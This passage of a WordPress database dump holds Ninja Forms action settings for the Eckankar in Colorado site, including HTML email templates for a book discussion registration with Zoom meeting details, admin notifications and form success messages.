Submission'),(5743,192,'editActive','','editActive',''),(5744,192,'to','{field:email}','to','{field:email}'),(5745,192,'objectDomain','actions','objectDomain','actions'),(5746,192,'from_name','','from_name',''),(5747,192,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(5748,192,'cc','','cc',''),(5749,192,'bcc','','bcc',''),(5750,192,'attach_csv','','attach_csv',''),(5751,192,'parent_id','44','parent_id','44'),(5752,192,'email_message_plain','','email_message_plain',''),(5753,192,'drawerDisabled','','drawerDisabled',''),(5754,192,'email_message','      <title>BOOK      REGISTRATION      TEMPLATE      -FINAL</title>        <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>                  96            </noscript>  <![endif]-->    <div style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\"><!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #23507d; font-family: Georgia, serif; background-color:#c0dbf6;\">Eckankar                              In                              Colorado<br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 22px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">Book                                Discussion                                Registration</span><br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;</span>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #23507D; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;\"Autobiography                                of                                a                                Modern                                Prophet\"</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<br>                                </span></p>                              <p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You                                  For                                  Registering!                                  <br></span></p>                              <p style=\"font-size: 18px;\"><strong>You                                  Are                                  Signed                                  Up                                  For                                  The                                  Following                                  Book                                  Discussion:<br>&nbsp;<span style=\"color: #23507d;font-size: 19px;\">\"Autobiography                                    of                                    a                                    Modern                                    Prophet\"                                    -Online<br>                                  </span><br>                                </strong><span style=\"color: #333333;font-size: 19px;\">This                                  class                                  started                                  on                                  <strong>May                                    16th,                                    2021</strong>                                  and                                  will                                  occur</span><span style=\"color: #333333;font-size: 19px; font-weight: bold;\">&nbsp;every                                  3rd                                  Sunday                                  --                                  </span><span style=\"color: #333333;font-size: 19px; font-weight: bold;\">11:45                                  a.m.                                  -                                  1:00                                  p.m.</span></p>                              <p style=\"font-size: 22px; color: #f28a27;\"><strong>Zoom                                  Login                                  Information:</strong></p>                              <strong>Meeting                                ID:</strong>                              844                              4204                              1787<br>                              <strong>Passcode:&nbsp;</strong>369369<br>                              <br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\" id=\"https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09\">https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09</a><br>                              <br>                              <strong>Dial-in                                number:                                1-346-248-7799                                (for                                those                                who                                need                                to                                join                                by                                phone)</strong><br>                              <br>                              After                              you                              click                              the                              link,                              you                              will                              be                              prompted                              to                              either                              download                              the                              app                              to                              enter                              the                              meeting                              or                              enter                              through                              your                              browser.                              Please                              note                              that                              Zoom                              works                              best                              if                              you                              download                              the                              app.                              It                              is                              more                              stable                              and                              has                              more                              functions.                              Select                              use                              computer                              audio                              for                              sound.<br>                              <br>                              Please                              join                              the                              meeting                              5                              -                              10                              minutes                              ahead                              of                              time                              to                              help                              us                              start                              on                              time.                              We                              look                              forward                              to                              seeing                              you                              at                              this                              online                              event.<br>                              <br>                              See                              you                              there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are                                receiving                                this                                email                                because                                you                                have                                submitted                                a                                request                                through                                the                                <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in                                  Colorado                                  website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you                                have                                any                                questions                                regarding                                the                                origin                                of                                this                                email,                                please                                feel                                free                                to                                get                                in                                touch,                                we\'re                                always                                happy                                to                                help                                out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\" style=\"text-decoration: none;\"><img style=\"color: rgb(204, 204, 204);\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" class=\"fr-fic fr-dii\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar                                In                                Colorado                                -2021<br>                                <a class=\"unsub\" href=\"mailto:webmaster@eckankar-colorado.org\" style=\"color: #cccccc; text-decoration: underline;\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table><!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  ','email_message','      <title>BOOK      REGISTRATION      TEMPLATE      -FINAL</title>        <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>                  96            </noscript>  <![endif]-->    <div style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\"><!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #23507d; font-family: Georgia, serif; background-color:#c0dbf6;\">Eckankar                              In                              Colorado<br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 22px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">Book                                Discussion                                Registration</span><br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;</span>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #23507D; font-family: Arial, sans-serif; line-height: 25px;\">&nbsp;\"Autobiography                                of                                a                                Modern                                Prophet\"</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<br>                                </span></p>                              <p style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You                                  For                                  Registering!                                  <br></span></p>                              <p style=\"font-size: 18px;\"><strong>You                                  Are                                  Signed                                  Up                                  For                                  The                                  Following                                  Book                                  Discussion:<br>&nbsp;<span style=\"color: #23507d;font-size: 19px;\">\"Autobiography                                    of                                    a                                    Modern                                    Prophet\"                                    -Online<br>                                  </span><br>                                </strong><span style=\"color: #333333;font-size: 19px;\">This                                  class                                  started                                  on                                  <strong>May                                    16th,                                    2021</strong>                                  and                                  will                                  occur</span><span style=\"color: #333333;font-size: 19px; font-weight: bold;\">&nbsp;every                                  3rd                                  Sunday                                  --                                  </span><span style=\"color: #333333;font-size: 19px; font-weight: bold;\">11:45                                  a.m.                                  -                                  1:00                                  p.m.</span></p>                              <p style=\"font-size: 22px; color: #f28a27;\"><strong>Zoom                                  Login                                  Information:</strong></p>                              <strong>Meeting                                ID:</strong>                              844                              4204                              1787<br>                              <strong>Passcode:&nbsp;</strong>369369<br>                              <br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\" id=\"https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09\">https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09</a><br>                              <br>                              <strong>Dial-in                                number:                                1-346-248-7799                                (for                                those                                who                                need                                to                                join                                by                                phone)</strong><br>                              <br>                              After                              you                              click                              the                              link,                              you                              will                              be                              prompted                              to                              either                              download                              the                              app                              to                              enter                              the                              meeting                              or                              enter                              through                              your                              browser.                              Please                              note                              that                              Zoom                              works                              best                              if                              you                              download                              the                              app.                              It                              is                              more                              stable                              and                              has                              more                              functions.                              Select                              use                              computer                              audio                              for                              sound.<br>                              <br>                              Please                              join                              the                              meeting                              5                              -                              10                              minutes                              ahead                              of                              time                              to                              help                              us                              start                              on                              time.                              We                              look                              forward                              to                              seeing                              you                              at                              this                              online                              event.<br>                              <br>                              See                              you                              there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are                                receiving                                this                                email                                because                                you                                have                                submitted                                a                                request                                through                                the                                <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in                                  Colorado                                  website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you                                have                                any                                questions                                regarding                                the                                origin                                of                                this                                email,                                please                                feel                                free                                to                                get                                in                                touch,                                we\'re                                always                                happy                                to                                help                                out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\" style=\"text-decoration: none;\"><img style=\"color: rgb(204, 204, 204);\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" class=\"fr-fic fr-dii\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar                                In                                Colorado                                -2021<br>                                <a class=\"unsub\" href=\"mailto:webmaster@eckankar-colorado.org\" style=\"color: #cccccc; text-decoration: underline;\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table><!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  '),(5755,193,'drawerDisabled','','drawerDisabled',''),(5756,193,'title','','title',''),(5757,193,'key','','key',''),(5758,193,'type','email','type','email'),(5759,193,'active','1','active','1'),(5760,193,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5761,193,'label','Admin Email Notification','label','Admin Email Notification'),(5762,193,'objectType','Action','objectType','Action'),(5763,193,'objectDomain','actions','objectDomain','actions'),(5764,193,'editActive','','editActive',''),(5765,193,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(5766,193,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5767,193,'message','{all_fields_table}','message','{all_fields_table}'),(5768,193,'order','2','order','2'),(5769,193,'payment_gateways','','payment_gateways',''),(5770,193,'payment_total','0','payment_total','0'),(5771,193,'tag','','tag',''),(5772,193,'email_subject','New Book Discussion Registration from {field:firstname} {field:lastname}','email_subject','New Book Discussion Registration from {field:firstname} {field:lastname}'),(5773,193,'email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br><div align=\"center\"><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New Book Discussion</span></div><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Registration</span><br></div><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\"></span></div></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new Book Discussion registration                                  has been received for <br>\"<span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><b><span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><span style=\"color: #0963ba;\"><span style=\"color: #000000;\"><em>Autobiography of a Modern Prophet</em></span></span></span></b>\"</span>.&nbsp; </p><p style=\"line-height: 125%; margin-top: 0px; margin-bottom: 0px;\"><span style=\"color: #333333; font-size: 20px;\">Class information:<br></span><span style=\"font-size: 20px; line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">11:45 <span style=\"line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">am </span></strong></span>- 1:00 pm - (3rd Sunday)</span></strong></span></p></b><b>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  ','email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br><div align=\"center\"><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New Book Discussion</span></div><div align=\"center\"><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Registration</span><br></div><span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\"></span></div></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new Book Discussion registration                                  has been received for <br>\"<span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><b><span style=\"font-size: 19px; line-height: 125%; color: #000000;\"><span style=\"color: #0963ba;\"><span style=\"color: #000000;\"><em>Autobiography of a Modern Prophet</em></span></span></span></b>\"</span>.&nbsp; </p><p style=\"line-height: 125%; margin-top: 0px; margin-bottom: 0px;\"><span style=\"color: #333333; font-size: 20px;\">Class information:<br></span><span style=\"font-size: 20px; line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">11:45 <span style=\"line-height: 125%; color: #000000;\"><strong><span style=\"line-height: 125%; color: #000000;\">am </span></strong></span>- 1:00 pm - (3rd Sunday)</span></strong></span></p></b><b>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  '),(5774,193,'from_name','','from_name',''),(5775,193,'from_address','','from_address',''),(5776,193,'reply_to','{field:email}','reply_to','{field:email}'),(5777,193,'email_format','html','email_format','html'),(5778,193,'cc','','cc',''),(5779,193,'bcc','','bcc',''),(5780,193,'attach_csv','','attach_csv',''),(5781,193,'parent_id','44','parent_id','44'),(5782,193,'email_message_plain','','email_message_plain',''),(5783,194,'title','','title',''),(5784,194,'key','','key',''),(5785,194,'type','successmessage','type','successmessage'),(5786,194,'active','1','active','1'),(5787,194,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5788,194,'label','Success Message','label','Success Message'),(5789,194,'objectType','Action','objectType','Action'),(5790,194,'objectDomain','actions','objectDomain','actions'),(5791,194,'editActive','','editActive',''),(5792,194,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(5793,194,'order','1','order','1'),(5794,194,'payment_gateways','','payment_gateways',''),(5795,194,'payment_total','0','payment_total','0'),(5796,194,'tag','','tag',''),(5797,194,'to','{wp:admin_email}','to','{wp:admin_email}'),(5798,194,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5799,194,'email_message','{fields_table}','email_message','{fields_table}'),(5800,194,'from_name','','from_name',''),(5801,194,'from_address','','from_address',''),(5802,194,'reply_to','','reply_to',''),(5803,194,'email_format','html','email_format','html'),(5804,194,'cc','','cc',''),(5805,194,'bcc','','bcc',''),(5806,194,'attach_csv','','attach_csv',''),(5807,194,'redirect_url','','redirect_url',''),(5808,194,'success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for this book discussion!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>','success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for this book discussion!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>'),(5809,194,'parent_id','44','parent_id','44'),(5810,194,'email_message_plain','','email_message_plain',''),(5811,194,'submitter_email','','submitter_email',''),(5812,194,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5813,194,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5814,194,'set_subs_to_expire','0','set_subs_to_expire','0'),(5815,194,'subs_expire_time','90','subs_expire_time','90'),(5816,194,'drawerDisabled','','drawerDisabled',''),(5817,195,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5818,195,'title','','title',''),(5819,195,'key','','key',''),(5820,195,'type','save','type','save'),(5821,195,'active','1','active','1'),(5822,195,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(5823,195,'label','Save Form','label','Save Form'),(5824,195,'objectType','Action','objectType','Action'),(5825,195,'objectDomain','actions','objectDomain','actions'),(5826,195,'editActive','','editActive',''),(5827,195,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5828,195,'payment_gateways','','payment_gateways',''),(5829,195,'payment_total','0','payment_total','0'),(5830,195,'tag','','tag',''),(5831,195,'to','{wp:admin_email}','to','{wp:admin_email}'),(5832,195,'reply_to','','reply_to',''),(5833,195,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5834,195,'email_message','{fields_table}','email_message','{fields_table}'),(5835,195,'email_message_plain','','email_message_plain',''),(5836,195,'from_name','','from_name',''),(5837,195,'from_address','','from_address',''),(5838,195,'email_format','html','email_format','html'),(5839,195,'cc','','cc',''),(5840,195,'bcc','','bcc',''),(5841,195,'redirect_url','','redirect_url',''),(5842,195,'submitter_email','','submitter_email',''),(5843,195,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5844,195,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5845,195,'set_subs_to_expire','0','set_subs_to_expire','0'),(5846,195,'subs_expire_time','90','subs_expire_time','90'),(5847,195,'parent_id','35','parent_id','35'),(5848,195,'drawerDisabled','','drawerDisabled',''),(5849,196,'title','','title',''),(5850,196,'key','','key',''),(5851,196,'type','email','type','email'),(5852,196,'active','0','active','0'),(5853,196,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(5854,196,'label','Send copy to user','label','Send copy to user'),(5855,196,'objectType','Action','objectType','Action'),(5856,196,'objectDomain','actions','objectDomain','actions'),(5857,196,'editActive','','editActive',''),(5858,196,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5859,196,'payment_gateways','','payment_gateways',''),(5860,196,'payment_total','0','payment_total','0'),(5861,196,'tag','','tag',''),(5862,196,'email_message_plain','','email_message_plain',''),(5863,196,'date_updated','2016-01-15','date_updated','2016-01-15'),(5864,196,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(5865,196,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(5866,196,'to','{field:email_270}','to','{field:email_270}'),(5867,196,'email_subject','Eckankar Colorado Springs - Communication','email_subject','Eckankar Colorado Springs - Communication'),(5868,196,'email_message','<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>','email_message','<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>'),(5869,196,'attach_csv','0','attach_csv','0'),(5870,196,'email_format','html','email_format','html'),(5871,196,'reply_to','','reply_to',''),(5872,196,'cc','','cc',''),(5873,196,'bcc','','bcc',''),(5874,196,'redirect_url','','redirect_url',''),(5875,196,'success_msg','','success_msg',''),(5876,196,'parent_id','35','parent_id','35'),(5877,196,'drawerDisabled','','drawerDisabled',''),(5878,197,'title','','title',''),(5879,197,'key','','key',''),(5880,197,'type','successmessage','type','successmessage'),(5881,197,'active','1','active','1'),(5882,197,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(5883,197,'label','Success Message','label','Success Message'),(5884,197,'objectType','Action','objectType','Action'),(5885,197,'objectDomain','actions','objectDomain','actions'),(5886,197,'editActive','','editActive',''),(5887,197,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 